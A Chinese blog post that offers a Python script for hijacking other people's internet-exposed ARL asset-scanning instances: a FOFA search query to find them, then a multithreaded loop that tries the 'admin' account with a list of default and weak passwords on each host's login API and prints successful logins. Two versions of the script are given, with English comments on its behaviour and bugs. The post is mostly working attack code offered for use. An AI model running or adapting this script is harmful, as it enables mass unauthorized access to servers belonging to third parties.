
在任何系统下使用公网ARL灯塔(免搭建)

你是否还因没vps上的ARL灯塔而烦恼?
那就试试这个脚本
fofa:
title='资产灯塔系统'

'''
抓ARL灯塔
'''
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import threading
# Module-level list shared by all worker threads; test_url() appends each accepted login to it.
result=[]
# Suppresses urllib3's InsecureRequestWarning, which is otherwise emitted for requests made with verify=False.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

class Bag:
    """A single credential attempt against one ARL login endpoint.

    Stores the username/password pair, the login URL built from the base
    URL, a fixed browser-like header set and the JSON body; send_bag()
    issues the one POST and reports whether the response looked like a
    successful login.
    """
    def __init__(self, url, username, passwd):
        """Build the request pieces for one (url, username, passwd) triple.

        Args:
            url: Base URL of the instance; "/api/user/login" is appended as-is.
            username: Account name placed in the JSON body.
            passwd: Candidate password placed in the JSON body.
        """
        self.username = username
        self.passwd = passwd
        self.url = f"{url}/api/user/login"
        # The header set is identical for every target. The User-Agent string
        # and the hard-coded Origin (a private address that will not match the
        # host actually contacted) are therefore constant across all requests
        # this script sends, which makes them usable match strings in proxy or
        # web-server logs on the receiving side.
        self.headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
            "Accept": "application/json, text/plain, */*",
            "Accept-Language": "zh-CN,en-US;q=0.7,en;q=0.3",
            "Accept-Encoding": "gzip, deflate, br",
            "Content-Type": "application/json; charset=UTF-8",
            "Origin": "https://192.168.0.103:5003",
            "Sec-Fetch-Dest": "empty",
            "Sec-Fetch-Mode": "cors",
            "Sec-Fetch-Site": "same-origin",
            "Te": "trailers",
        }
        # JSON body sent to the login endpoint.
        self.data = {
            "username": f"{username}",
            "password": f"{passwd}",
        }

    def send_bag(self):
        """POST the credentials once and classify the response.

        Returns:
            ['right', url, username, passwd] when the response body contains
            the success marker; None otherwise, including on any exception.
        """
        try:
            # verify=False turns off TLS certificate validation, so the
            # credentials are sent without confirming the server's identity.
            # No timeout is passed to requests.post.
            response = requests.post(self.url, json=self.data, headers=self.headers, verify=False)
            # Success is detected by a substring match on the raw body, not by parsing the JSON.
            if response.text.find('{"message": "success", "code": 200,') != -1:
                return ['right', self.url, self.username, self.passwd]
        # Bare except: every error is discarded and the method falls through to
        # an implicit None, which the caller cannot tell apart from a rejected login.
        except:
            pass

def read_urls_from_file(urls_file_path):
    """Yield every non-blank line of the file, stripped of surrounding whitespace.

    Args:
        urls_file_path: Path of a text file holding one entry per line.

    Yields:
        Each line that is non-empty after stripping, in file order.
    """
    with open(urls_file_path, 'r') as handle:
        # readlines() loads the whole file up front; whitespace-only lines
        # strip down to '' and are dropped by filter(None, ...).
        yield from filter(None, map(str.strip, handle.readlines()))

def test_url(url, passwds):
    """Try each password in passwds against url until one is accepted.

    The account name is not a parameter: it is read from the module-level
    `username` assigned in the __main__ block. The first accepted attempt is
    appended to the shared `result` list and printed; if none is accepted a
    'failed' status line is printed instead.

    Args:
        url: Base URL passed through to Bag.
        passwds: Iterable of candidate passwords, tried in order.
    """
    # Flag: stays 0 unless an attempt is accepted.
    a=0
    for passwd in passwds:
        # One POST to /api/user/login per password, back to back with no delay,
        # so the receiving host sees a short burst of login attempts for the
        # same account from one source.
        response = Bag(url=url, passwd=passwd, username=username).send_bag()
        if response is not None:
            result.append(response)
            print('\n',response , '<-----------------------------------------------------------------')
            a=1
            # Stop at the first accepted password.
            break
    if a!=1:
        # '\r' with end='' rewrites the same console line instead of scrolling.
        print('failed'+f'{url}'+'\r',end='')

if __name__ == "__main__":
    # Fixed account name; test_url() reads this as a global.
    username = 'admin'
    # Short list of default/weak passwords tried against that one account.
    # NOTE(review): 'arlpass' looks like ARL's shipped default password — confirm.
    # An instance whose admin password is not in a list like this, or whose
    # login port is not reachable from the internet, is not matched by this loop.
    passwds = ['admin123', 'honmashironeko', 'admin', 'arlpass', '114514', 'passwd123', 'password123', 'root']
    # Input list of base URLs, one per line (author's local path).
    urls_file_path = '/root/weapons/XIN-SHOU/fofaHack.ARL-wudanshiturls.txt'

    threads = []
    # One thread per URL, each started immediately; the number of concurrent
    # threads is not capped.
    for url in read_urls_from_file(urls_file_path):
        print(f'testing {url}'+'\r',end='')
        thread = threading.Thread(target=test_url, args=(url, passwds))
        threads.append(thread)
        thread.start()

    # Wait for every worker before the final print.
    for thread in threads:
        thread.join()
# At column 0, outside the __main__ guard, so this also runs when the module is imported.
print(result)

即兴编写,能达到目的,代码还需完善

补充适配无头url字典的代码:

'''
抓ARL灯塔
'''
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import threading
# Module-level list shared by all worker threads; test_url() appends each accepted login to it.
result=[]
# Suppresses urllib3's InsecureRequestWarning, which is otherwise emitted for requests made with verify=False.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

class Bag:
    """A single credential attempt against one ARL login endpoint.

    Stores the username/password pair, the login URL built from the base
    URL, a fixed browser-like header set and the JSON body; send_bag()
    issues the one POST and reports whether the response looked like a
    successful login.
    """
    def __init__(self, url, username, passwd):
        """Build the request pieces for one (url, username, passwd) triple.

        Args:
            url: Base URL of the instance; "/api/user/login" is appended as-is.
            username: Account name placed in the JSON body.
            passwd: Candidate password placed in the JSON body.
        """
        self.username = username
        self.passwd = passwd
        self.url = f"{url}/api/user/login"
        # The header set is identical for every target. The User-Agent string
        # and the hard-coded Origin (a private address that will not match the
        # host actually contacted) are therefore constant across all requests
        # this script sends, which makes them usable match strings in proxy or
        # web-server logs on the receiving side.
        self.headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
            "Accept": "application/json, text/plain, */*",
            "Accept-Language": "zh-CN,en-US;q=0.7,en;q=0.3",
            "Accept-Encoding": "gzip, deflate, br",
            "Content-Type": "application/json; charset=UTF-8",
            "Origin": "https://192.168.0.103:5003",
            "Sec-Fetch-Dest": "empty",
            "Sec-Fetch-Mode": "cors",
            "Sec-Fetch-Site": "same-origin",
            "Te": "trailers",
        }
        # JSON body sent to the login endpoint.
        self.data = {
            "username": f"{username}",
            "password": f"{passwd}",
        }

    def send_bag(self):
        """POST the credentials once and classify the response.

        Returns:
            ['right', url, username, passwd] when the response body contains
            the substring 'token'; None otherwise, including on any exception.
        """
        try:
            # verify=False turns off TLS certificate validation, so the
            # credentials are sent without confirming the server's identity.
            # No timeout is passed to requests.post.
            response = requests.post(self.url, json=self.data, headers=self.headers, verify=False)
            # Success is inferred from 'token' appearing anywhere in the raw
            # body; the JSON is not parsed, so any body containing that word
            # is counted as a hit.
            if response.text.find('token') != -1:
                return ['right', self.url, self.username, self.passwd]
        # Bare except: every error is discarded and the method falls through to
        # an implicit None, which the caller cannot tell apart from a rejected login.
        except:
            pass
def add_http_head(url):
    """Prefix a scheme-less entry with 'https://'.

    Args:
        url: One stripped line from the URL list.

    Returns:
        'https://' + url when url does not start with 'http'. There is no
        return statement on the other path, so an entry that already starts
        with 'http' yields None.
    """
    if not url.startswith('http'):
        return f'https://{url}'
def read_urls_from_file(urls_file_path):
    """Yield add_http_head() of every non-blank, stripped line of the file.

    Args:
        urls_file_path: Path of a text file holding one entry per line.

    Yields:
        The value add_http_head() returns for each line that is non-empty
        after stripping, in file order.
    """
    with open(urls_file_path, 'r') as handle:
        # readlines() loads the whole file up front; whitespace-only lines
        # strip down to '' and are dropped by filter(None, ...).
        for entry in filter(None, map(str.strip, handle.readlines())):
            yield add_http_head(entry)

def test_url(url, passwds):
    """Try each password in passwds against url until one is accepted.

    The account name is not a parameter: it is read from the module-level
    `username` assigned in the __main__ block. The first accepted attempt is
    appended to the shared `result` list and printed; if none is accepted a
    'failed' status line is printed instead.

    Args:
        url: Base URL passed through to Bag.
        passwds: Iterable of candidate passwords, tried in order.
    """
    # Flag: stays 0 unless an attempt is accepted.
    a=0
    for passwd in passwds:
        # One POST to /api/user/login per password, back to back with no delay,
        # so the receiving host sees a short burst of login attempts for the
        # same account from one source.
        response = Bag(url=url, passwd=passwd, username=username).send_bag()
        if response is not None:
            result.append(response)
            print('\n',response , '<-----------------------------------------------------------------')
            a=1
            # Stop at the first accepted password.
            break
    if a!=1:
        # '\r' with end='' rewrites the same console line instead of scrolling.
        print('failed'+f'{url}'+'\r',end='')

if __name__ == "__main__":
    # Fixed account name; test_url() reads this as a global.
    username = 'admin'
    # Short list of default/weak passwords tried against that one account.
    # NOTE(review): 'arlpass' looks like ARL's shipped default password — confirm.
    # An instance whose admin password is not in a list like this, or whose
    # login port is not reachable from the internet, is not matched by this loop.
    passwds = ['admin123', 'honmashironeko', 'admin', 'arlpass', '114514', 'passwd123', 'password123', 'root']
    # Input list of entries, one per line (author's local path).
    urls_file_path = '/root/weapons/SAO/ARLS-URL.TXT'

    threads = []
    # One thread per entry, each started immediately; the number of concurrent
    # threads is not capped.
    for url in read_urls_from_file(urls_file_path):
        print(f'testing {url}'+'\r',end='')
        thread = threading.Thread(target=test_url, args=(url, passwds))
        threads.append(thread)
        thread.start()

    # Wait for every worker before the final print.
    for thread in threads:
        thread.join()
# At column 0, outside the __main__ guard, so this also runs when the module is imported.
print(result)

本文作者:sesmof

本文链接:https://www.cnblogs.com/sesmof/p/18301633

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
